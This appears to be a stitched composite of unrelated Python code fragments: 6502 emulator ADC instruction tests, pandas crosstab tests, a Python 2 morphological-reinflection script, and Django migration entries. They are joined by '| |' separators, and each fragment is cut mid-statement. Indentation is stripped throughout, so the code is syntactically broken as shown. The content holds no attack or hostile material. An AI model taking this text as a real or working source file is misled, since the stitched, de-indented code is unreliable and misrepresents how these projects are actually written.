mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.y] = 0xFF
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.y] = 0x01
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.y] = 0xFF
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7f
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.y] = 0x01
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x80, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x80
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.y] = 0xFF
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7f, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x40
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.y] = 0x40
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x80, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Zero Page, X-Indexed
def test_adc_bcd_off_zp_x_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
mpu.memory[0x0010 + mpu.x] = 0x00
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_zp_x_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
mpu.memory[0x0010 + mpu.x] = 0x00
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_zp_x_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
mpu.memory[0x0010 + mpu.x] = 0xFE
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_zp_x_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
mpu.memory[0x0010 + mpu.x] = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_zp_x_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
mpu.memory[0x0010 + mpu.x] = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_zp_x_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
mpu.memory[0x0010 + mpu.x] = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_zp_x_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7f
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
mpu.memory[0x0010 + mpu.x] = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x80, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_zp_x_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x80
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
mpu.memory[0x0010 + mpu.x] = 0xff
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7f, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_zp_x_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x40
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
mpu.memory[0x0010 + mpu.x] = 0x40
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x80, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Indirect, Indexed (X)
def test_adc_bcd_off_ind_indexed_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
mpu.memory[0xABCD] = 0x00
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_ind_indexed_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
mpu.memory[0xABCD] = 0x00
mpu.step()
self.assertEqual(0x0002, mpu.pc)
| |
[np.array([1, 1, 2, 2]), np.array([1, 2, 1, 2])], np.array([1, 2, 1, 2])
)
# Test with aggfunc
norm_counts = DataFrame(
[[0.25, 0, 0.25], [0.25, 0.5, 0.75], [0.5, 0.5, 1]],
index=Index([1, 2, "All"], name="a", dtype="object"),
columns=Index([3, 4, "All"], name="b"),
)
test_case = crosstab(
df.a, df.b, df.c, aggfunc="count", normalize="all", margins=True
)
tm.assert_frame_equal(test_case, norm_counts)
df = DataFrame(
{"a": [1, 2, 2, 2, 2], "b": [3, 3, 4, 4, 4], "c": [0, 4, np.nan, 3, 3]}
)
norm_sum = DataFrame(
[[0, 0, 0.0], [0.4, 0.6, 1], [0.4, 0.6, 1]],
index=Index([1, 2, "All"], name="a", dtype="object"),
columns=Index([3, 4, "All"], name="b", dtype="object"),
)
test_case = crosstab(
df.a, df.b, df.c, aggfunc=np.sum, normalize="all", margins=True
)
tm.assert_frame_equal(test_case, norm_sum)
def test_crosstab_with_empties(self):
# Check handling of empties
df = DataFrame(
{
"a": [1, 2, 2, 2, 2],
"b": [3, 3, 4, 4, 4],
"c": [np.nan, np.nan, np.nan, np.nan, np.nan],
}
)
empty = DataFrame(
[[0.0, 0.0], [0.0, 0.0]],
index=Index([1, 2], name="a", dtype="int64"),
columns=Index([3, 4], name="b"),
)
for i in [True, "index", "columns"]:
calculated = crosstab(df.a, df.b, values=df.c, aggfunc="count", normalize=i)
tm.assert_frame_equal(empty, calculated)
nans = DataFrame(
[[0.0, np.nan], [0.0, 0.0]],
index=Index([1, 2], name="a", dtype="int64"),
columns=Index([3, 4], name="b"),
)
calculated = crosstab(df.a, df.b, values=df.c, aggfunc="count", normalize=False)
tm.assert_frame_equal(nans, calculated)
def test_crosstab_errors(self):
# Issue 12578
df = DataFrame(
{"a": [1, 2, 2, 2, 2], "b": [3, 3, 4, 4, 4], "c": [1, 1, np.nan, 1, 1]}
)
error = "values cannot be used without an aggfunc."
with pytest.raises(ValueError, match=error):
crosstab(df.a, df.b, values=df.c)
error = "aggfunc cannot be used without values"
with pytest.raises(ValueError, match=error):
crosstab(df.a, df.b, aggfunc=np.mean)
error = "Not a valid normalize argument"
with pytest.raises(ValueError, match=error):
crosstab(df.a, df.b, normalize="42")
with pytest.raises(ValueError, match=error):
crosstab(df.a, df.b, normalize=42)
error = "Not a valid margins argument"
with pytest.raises(ValueError, match=error):
crosstab(df.a, df.b, normalize="all", margins=42)
def test_crosstab_with_categorial_columns(self):
# GH 8860
df = DataFrame(
{
"MAKE": ["Honda", "Acura", "Tesla", "Honda", "Honda", "Acura"],
"MODEL": ["Sedan", "Sedan", "Electric", "Pickup", "Sedan", "Sedan"],
}
)
categories = ["Sedan", "Electric", "Pickup"]
df["MODEL"] = df["MODEL"].astype("category").cat.set_categories(categories)
result = crosstab(df["MAKE"], df["MODEL"])
expected_index = Index(["Acura", "Honda", "Tesla"], name="MAKE")
expected_columns = CategoricalIndex(
categories, categories=categories, ordered=False, name="MODEL"
)
expected_data = [[2, 0, 0], [2, 0, 1], [0, 1, 0]]
expected = DataFrame(
expected_data, index=expected_index, columns=expected_columns
)
tm.assert_frame_equal(result, expected)
def test_crosstab_with_numpy_size(self):
# GH 4003
df = DataFrame(
{
"A": ["one", "one", "two", "three"] * 6,
"B": ["A", "B", "C"] * 8,
"C": ["foo", "foo", "foo", "bar", "bar", "bar"] * 4,
"D": np.random.randn(24),
"E": np.random.randn(24),
}
)
result = crosstab(
index=[df["A"], df["B"]],
columns=[df["C"]],
margins=True,
aggfunc=np.size,
values=df["D"],
)
expected_index = MultiIndex(
levels=[["All", "one", "three", "two"], ["", "A", "B", "C"]],
codes=[[1, 1, 1, 2, 2, 2, 3, 3, 3, 0], [1, 2, 3, 1, 2, 3, 1, 2, 3, 0]],
names=["A", "B"],
)
expected_column = Index(["bar", "foo", "All"], dtype="object", name="C")
expected_data = np.array(
[
[2.0, 2.0, 4.0],
[2.0, 2.0, 4.0],
[2.0, 2.0, 4.0],
[2.0, np.nan, 2.0],
[np.nan, 2.0, 2.0],
[2.0, np.nan, 2.0],
[np.nan, 2.0, 2.0],
[2.0, np.nan, 2.0],
[np.nan, 2.0, 2.0],
[12.0, 12.0, 24.0],
]
)
expected = DataFrame(
expected_data, index=expected_index, columns=expected_column
)
tm.assert_frame_equal(result, expected)
def test_crosstab_duplicate_names(self):
# GH 13279 / 22529
s1 = Series(range(3), name="foo")
s2_foo = Series(range(1, 4), name="foo")
s2_bar = Series(range(1, 4), name="bar")
s3 = Series(range(3), name="waldo")
# check result computed with duplicate labels against
# result computed with unique labels, then relabelled
mapper = {"bar": "foo"}
# duplicate row, column labels
result = crosstab(s1, s2_foo)
expected = crosstab(s1, s2_bar).rename_axis(columns=mapper, axis=1)
tm.assert_frame_equal(result, expected)
# duplicate row, unique column labels
result = crosstab([s1, s2_foo], s3)
expected = crosstab([s1, s2_bar], s3).rename_axis(index=mapper, axis=0)
tm.assert_frame_equal(result, expected)
# unique row, duplicate column labels
result = crosstab(s3, [s1, s2_foo])
expected = crosstab(s3, [s1, s2_bar]).rename_axis(columns=mapper, axis=1)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("names", [["a", ("b", "c")], [("a", "b"), "c"]])
def test_crosstab_tuple_name(self, names):
s1 = Series(range(3), name=names[0])
s2 = Series(range(1, 4), name=names[1])
mi = MultiIndex.from_arrays([range(3), range(1, 4)], names=names)
expected = Series(1, index=mi).unstack(1, fill_value=0)
result = crosstab(s1, s2)
tm.assert_frame_equal(result, expected)
def test_crosstab_both_tuple_names(self):
# GH 18321
s1 = Series(range(3), name=("a", "b"))
s2 = Series(range(3), name=("c", "d"))
expected = DataFrame(
np.eye(3, dtype="int64"),
index=Index(range(3), name=("a", "b")),
columns=Index(range(3), name=("c", "d")),
)
result = crosstab(s1, s2)
tm.assert_frame_equal(result, expected)
def test_crosstab_unsorted_order(self):
df = DataFrame({"b": [3, 1, 2], "a": [5, 4, 6]}, index=["C", "A", "B"])
result = crosstab(df.index, [df.b, df.a])
e_idx = Index(["A", "B", "C"], name="row_0")
e_columns = MultiIndex.from_tuples([(1, 4), (2, 6), (3, 5)], names=["b", "a"])
expected = DataFrame(
[[1, 0, 0], [0, 1, 0], [0, 0, 1]], index=e_idx, columns=e_columns
)
tm.assert_frame_equal(result, expected)
def test_crosstab_normalize_multiple_columns(self):
# GH 15150
df = DataFrame(
{
"A": ["one", "one", "two", "three"] * 6,
"B": ["A", "B", "C"] * 8,
"C": ["foo", "foo", "foo", "bar", "bar", "bar"] * 4,
"D": [0] * 24,
"E": [0] * 24,
}
)
result = crosstab(
[df.A, df.B],
df.C,
values=df.D,
aggfunc=np.sum,
normalize=True,
margins=True,
)
expected = DataFrame(
np.array([0] * 29 + [1], dtype=float).reshape(10, 3),
columns=Index(["bar", "foo", "All"], dtype="object", name="C"),
index=MultiIndex.from_tuples(
[
("one", "A"),
("one", "B"),
("one", "C"),
("three", "A"),
("three", "B"),
("three", "C"),
("two", "A"),
("two", "B"),
("two", "C"),
("All", ""),
],
names=["A", "B"],
),
)
tm.assert_frame_equal(result, expected)
def test_margin_normalize(self):
# GH 27500
df = DataFrame(
{
"A": ["foo", "foo", "foo", "foo", "foo", "bar", "bar", "bar", "bar"],
"B": ["one", "one", "one", "two", "two", "one", "one", "two", "two"],
"C": [
"small",
"large",
"large",
"small",
"small",
"large",
"small",
"small",
"large",
],
"D": [1, 2, 2, 3, 3, 4, 5, 6, 7],
"E": [2, 4, 5, 5, 6, 6, 8, 9, 9],
}
)
# normalize on index
result = crosstab(
[df.A, df.B], df.C, margins=True, margins_name="Sub-Total", normalize=0
)
expected = DataFrame(
[[0.5, 0.5], [0.5, 0.5], [0.666667, 0.333333], [0, 1], [0.444444, 0.555556]]
)
expected.index = MultiIndex(
levels=[["Sub-Total", "bar", "foo"], ["", "one", "two"]],
codes=[[1, 1, 2, 2, 0], [1, 2, 1, 2, 0]],
names=["A", "B"],
)
expected.columns = Index(["large", "small"], dtype="object", name="C")
tm.assert_frame_equal(result, expected)
# normalize on columns
result = crosstab(
[df.A, df.B], df.C, margins=True, margins_name="Sub-Total", normalize=1
)
expected = DataFrame(
[
[0.25, 0.2, 0.222222],
[0.25, 0.2, 0.222222],
[0.5, 0.2, 0.333333],
[0, 0.4, 0.222222],
]
)
expected.columns = Index(
["large", "small", "Sub-Total"], dtype="object", name="C"
)
expected.index = MultiIndex(
levels=[["bar", "foo"], ["one", "two"]],
codes=[[0, 0, 1, 1], [0, 1, 0, 1]],
names=["A", "B"],
)
tm.assert_frame_equal(result, expected)
# normalize on both index and column
result = crosstab(
[df.A, df.B], df.C, margins=True, margins_name="Sub-Total", normalize=True
)
expected = DataFrame(
[
[0.111111, 0.111111, 0.222222],
[0.111111, 0.111111, 0.222222],
[0.222222, 0.111111, 0.333333],
[0.000000, 0.222222, 0.222222],
[0.444444, 0.555555, 1],
]
)
expected.columns = Index(
["large", "small", "Sub-Total"], dtype="object", name="C"
)
expected.index = MultiIndex(
levels=[["Sub-Total", "bar", "foo"], ["", "one", "two"]],
codes=[[1, 1, 2, 2, 0], [1, 2, 1, 2, 0]],
names=["A", "B"],
)
tm.assert_frame_equal(result, expected)
def test_margin_normalize_multiple_columns(self):
# GH 35144
# use multiple columns with margins and normalization
df = DataFrame(
{
"A": ["foo", "foo", "foo", "foo", "foo", "bar", "bar", "bar", "bar"],
"B": ["one", "one", "one", "two", "two", "one", "one", "two", "two"],
"C": [
"small",
"large",
"large",
"small",
"small",
"large",
"small",
"small",
"large",
],
"D": [1, 2, 2, 3, 3, 4, 5, 6, 7],
"E": [2, 4, 5, 5, 6, 6, 8, 9, 9],
}
)
result = crosstab(
index=df.C,
columns=[df.A, df.B],
margins=True,
margins_name="margin",
normalize=True,
)
expected = DataFrame(
[
[0.111111, 0.111111, 0.222222, 0.000000, 0.444444],
[0.111111, 0.111111, 0.111111, 0.222222, 0.555556],
[0.222222, 0.222222, 0.333333, 0.222222, 1.0],
],
index=["large", "small", "margin"],
)
expected.columns = MultiIndex(
levels=[["bar", "foo", "margin"], ["", "one", "two"]],
codes=[[0, 0, 1, 1, 2], [1, 2, 1, 2, 0]],
names=["A", "B"],
)
expected.index.name = "C"
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("a_dtype", ["category", "int64"])
@pytest.mark.parametrize("b_dtype", ["category", "int64"])
def test_categoricals(a_dtype, b_dtype):
# https://github.com/pandas-dev/pandas/issues/37465
g = np.random.RandomState(25982704)
a = Series(g.randint(0, 3, size=100)).astype(a_dtype)
b = Series(g.randint(0, 2, size=100)).astype(b_dtype)
result = crosstab(a, b, margins=True, dropna=False)
columns = Index([0, 1, "All"], dtype="object", name="col_0")
index = Index([0, 1, 2, "All"], dtype="object", name="row_0")
values = [[18, 16, 34], [18, 16, 34], [16, 16, 32], [52, 48, 100]]
expected = DataFrame(values, index, columns)
tm.assert_frame_equal(result, expected)
# Verify when categorical does not have all values present
a.loc[a == 1] = 2
a_is_cat = is_categorical_dtype(a.dtype)
assert not a_is_cat or a.value_counts().loc[1] == 0
result = crosstab(a, b, | |
<reponame>oncebasun/seq2seq-theano
# -*- coding: utf-8 -*-
#!/usr/bin/env python
from __future__ import print_function
from MyAlgorithm.filter_wrong_forms_reinflection_new import Filter as Filter2 # the 'new' here is a test
from MyAlgorithm.filter_wrong_forms import Filter
import perceptron_c, align, codecs, sys, re, getopt
import pickle as cPickle
from itertools import izip
import sys
import datetime
import time
import io
import editdistance
from shutil import copyfile
from random import shuffle
import codecs
import argparse
import logging
import pprint
import sys
import os, signal
from RNN import configurations2 as configurations
from RNN.__init__BACKUP import main as rnnMain
#print('lala')
from RNN.__init__BACKUP import mainPredict as rnnPredict
from RNN.stream import get_tr_stream, get_test_stream, get_dev_stream
import RNN.sampling as sampling
###############################################################################
# IMPORTANT: NEVER TOUCH ANY OF THIS. ONLY CHANGES ALLOWED ARE VIA COMMAND LINE.
# The filter evaluating which results are right and which are wrong.
noFilter = True #TODO: change this via command line ONLY
# This is for the NN I used before. Don't activate this anymore; results were horrible.
loadModel = False
# Defines which classifier should be used.
classifierToUse = 'rnn' # Options are: 'perceptron' (=baseline), 'rnn', 'nn' ('nn' should not be used anymore)
# Use trainRnn=True to train the RNN. For evaluation use trainRnn=False.
trainRnn = True # has to be set only when RNN is used TODO: change this via command line ONLY
# Defines if testing should be done with an ensemble. (0 means no, a number is the number of single networks)
use_ensemble = 1 # number of networks in the ensemble in testing; in training number of the currently trained network; TODO: change this via command line ONLY
# If the system should use corpus information for error correction.
# This has only effect when using it together with 'noFilter = False'.
use_corpus = False #TODO: change this via command line ONLY
######### command line flags
sample_from_prob = False
test_on_dev = False
the_way = 1 # how the answer will be produced
###############################################################################
class MorphModel:
def __init__(self):
self.features = {'tolemma':None, 'fromlemma':None}
self.classes = {'tolemma':None, 'fromlemma':None}
self.classifier = {'tolemma':None, 'fromlemma':None}
class Morph:
def __init__(self):
self.models = {}
self.msdfeatures = None
self.msdclasses = None
self.msdclassifier = None
def generate(self, word, featurestring, mode):
#print('Input: ' + word)
"""Generates an output string from an input word and target
feature string. The 'mode' variable is either 'tolemma' or
'fromlemma' """
pos = re.match(r'pos=([^,]*)', featurestring).group(1)
ins = ['<'] + list(word) + ['>']
outs = []
prevaction = 'None'
position = 0
while position < len(ins):
feats = list(train_get_surrounding_syms(ins, position, u'in_')) + \
list(train_get_surrounding_syms(outs, position, u'out_', lookright = False)) + \
['prevaction='+prevaction] + [u'MSD:' + featurestring]
feats = feature_pairs(feats)
if usePerceptron:
decision = self.models[pos].classifier[mode].decision_function(feats)
else:
decision = mlp.decision_function(self.models[pos].classifier[mode], feats)
decision = sorted(decision, key = lambda x: x[1], reverse = True)
prevaction = self._findmax(decision, prevaction, len(ins)-position-1)
actionlength, outstring = interpret_action(prevaction, ins[position])
outs.append(outstring)
position += actionlength
return ''.join(outs[1:-1])
def _findmax(self, decision, lastaction, maxlength):
"""Find best action that doesn't conflict with last (can't del/ins/chg two in a row)
and isn't too long (can't change/del more than what remains)."""
#return decision # TODO: this is a hack. Rethink it
if lastaction[0] == 'D' or lastaction[0] == 'C' or lastaction[0] == 'I':
for x in xrange(len(decision)):
if decision[x][0][0] != lastaction[0]:
if decision[x][0][0] == u'C' and len(decision[x][0][1:]) > maxlength:
continue
if decision[x][0][0] == u'D' and int(decision[x][0][1:]) > maxlength:
continue
return decision[x][0]
else:
return decision[0][0]
def add_features(self, pos, features, classes, mode):
"""Adds a collection of feautures and classes to a pos model
'mode' is either 'tolemma' or 'fromlemma'."""
if pos not in self.models:
self.models[pos] = MorphModel()
self.models[pos].features[mode] = features
self.models[pos].classes[mode] = classes
def get_pos(self):
"""Simply lists all poses associated with a model."""
return list(self.models.keys())
def add_classifier(self, pos, classifier, mode):
"""Adds a classifier to a pos model in a certain mode."""
self.models[pos].classifier[mode] = classifier
def get_features(self, pos, mode):
return self.models[pos].features[mode]
def get_classes(self, pos, mode):
return self.models[pos].classes[mode]
def extract_task3(self, lang, path):
# We use the msd/form combinations from all three
msdform = set()
lines = [line.strip() for line in codecs.open(path + lang +'-task1-train', "r", encoding="utf-8")]
for l in lines:
lemma, msd, form = l.split(u'\t')
msdform.add((msd, form))
lines = [line.strip() for line in codecs.open(path + lang +'-task2-train', "r", encoding="utf-8")]
for l in lines:
msd1, form1, msd2, form2 = l.split(u'\t')
msdform.add((msd1, form1))
msdform.add((msd2, form2))
lines = [line.strip() for line in codecs.open(path + lang +'-task3-train', "r", encoding="utf-8")]
for l in lines:
form1, msd2, form2 = l.split(u'\t')
msdform.add((msd2, form2))
self.msdfeatures = []
self.msdclasses = []
for msd, form in msdform:
formfeatures = extract_substrings(form)
self.msdfeatures.append(formfeatures)
self.msdclasses.append(msd)
def extract_task1(self, filename, mode, path):
"""Parse a file and extract features/classes for
mapping to and from a lemma form."""
lemmas = {} # mapping from each lemma to all its possible forms (including the lemma itself)
poses = set()
lines = [line.strip() for line in codecs.open(path + filename, "r", encoding="utf-8")]
for l in lines:
if 'pos=' not in l:
continue
lemma, feats, form = l.split(u'\t')
pos = re.match(r'pos=([^,]*)', feats).group(1)
if lemma not in lemmas:
lemmas[lemma] = []
lemmas[lemma].append((lemma, 'pos=' + pos + ',lemma=true'))
lemmas[lemma].append((form, feats)) # form is the word, feats are the tags
if pos not in poses:
poses.add(pos)
pairs = []
wordpairs = []
for lemma in lemmas:
lemmafeatures = lemmas[lemma]
for x in lemmafeatures:
for y in lemmafeatures:
if (x != y) and ('lemma=true' in x[1]) and (mode == 'fromlemma'):
pairs.append(tuple((x[0], y[0], y[1]))) # lemma, word, tags
wordpairs.append(tuple((x[0], y[0])))
elif (x != y) and ('lemma=true' in x[1]) and (mode == 'tolemma'):
pairs.append(tuple((y[0], x[0], y[1]))) # word, lemma, tags
wordpairs.append(tuple((y[0], x[0])))
if ALIGNTYPE == 'mcmc':
alignedpairs = mcmc_align(wordpairs, ALIGN_SYM)
elif ALIGNTYPE == 'med':
alignedpairs = med_align(wordpairs, ALIGN_SYM)
else:
alignedpairs = dumb_align(wordpairs, ALIGN_SYM)
chunkedpairs = chunk(alignedpairs) # makes them basicall have the same length, I guess
for pos in poses: # Do one model per POS
features = []
classes = []
# sample pair: [(u'L', u'L'), (u'u', u'\xfc'), (u's', u's'), (u't', u't'), (u'_', u'e')]
for idx, pair in enumerate(chunkedpairs):
if 'pos=' + pos not in pairs[idx][2]:
continue
instring = ['<'] + [x[0] for x in pair] + ['>']
outstring = ['<'] + [x[1] for x in pair] + ['>']
msdfeatures = [ pairs[idx][2] ] # don't separate features
msdfeatures = ['MSD:' + f for f in msdfeatures] # just put MSD in front of them
prevaction = 'None'
for position in range(0, len(instring)): # len(instring) = len(outstring)! Because of chunking
thiscl, feats = train_get_features(instring, outstring, position)
classes.append(thiscl) # as a class, I should insert Umlaut
featurelist = list(feats) + msdfeatures + ['prevaction='+prevaction]
featurelist = feature_pairs(featurelist)
features.append(featurelist)
prevaction = thiscl
self.add_features(pos, features, classes, mode)
def feature_pairs(f):
"""Expand features to include pairs of features
where one is always a f=v feature."""
pairs = [x + ".x." + y for x in f for y in f if u'=' in y]
return pairs + f
def dumb_align(wordpairs, align_symbol):
alignedpairs = []
for idx, pair in enumerate(wordpairs):
ins = pair[0]
outs = pair[1]
if len(ins) > len(outs):
outs = outs + align_symbol * (len(ins)-len(outs))
elif len(outs) > len(ins):
ins = ins + align_symbol * (len(outs)-len(ins))
alignedpairs.append((ins, outs))
return alignedpairs
def mcmc_align(wordpairs, align_symbol):
a = align.Aligner(wordpairs, align_symbol = align_symbol)
return a.alignedpairs
def med_align(wordpairs, align_symbol):
a = align.Aligner(wordpairs, align_symbol = align_symbol, mode = 'med')
return a.alignedpairs
def train_get_surrounding_syms(s, position, featureprefix, lookright = True):
"""Get surrounding symbols from a list of chunks and position.
>>> s = ['<', u'a', u'b', u'u', u'_', u't', u'a', u'n', u'doka', '>']
>>> train_get_surrounding_syms(s, 4, 'in_')
set([u'nin_ta', u'nin_t', u'nin_tan', u'pin_u', u'pin_bu', u'pin_abu'])
"""
leftfeats = set()
rightfeats = set()
if position == 0:
leftfeats |= {u'p' + featureprefix + u'none'}
if (position == len(s)) and lookright:
rightfeats |= {u'n' + featureprefix + u'none'}
if position > 0:
left = ''.join(s[:position]).replace(u'_', u'')
leftfeats |= {u'p' + featureprefix + left[x:] for x in [-1,-2,-3]}
if (position < len(s)) and lookright:
right = ''.join(s[position:]).replace(u'_', u'')
rightfeats |= {u'n' + featureprefix + right[:x] for x in [1,2,3]}
return leftfeats | rightfeats
def train_get_features(ins, outs, position):
feats = set()
# Get class first #
if ins[position] == outs[position]:
cl = "R"
elif u'_' in ins[position]:
cl = "I" + outs[position]
elif u'_' in | |
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 1 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 1 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Awayan',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Awayan',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Awayan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Batumandi',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Batumandi',
'proxy': True,
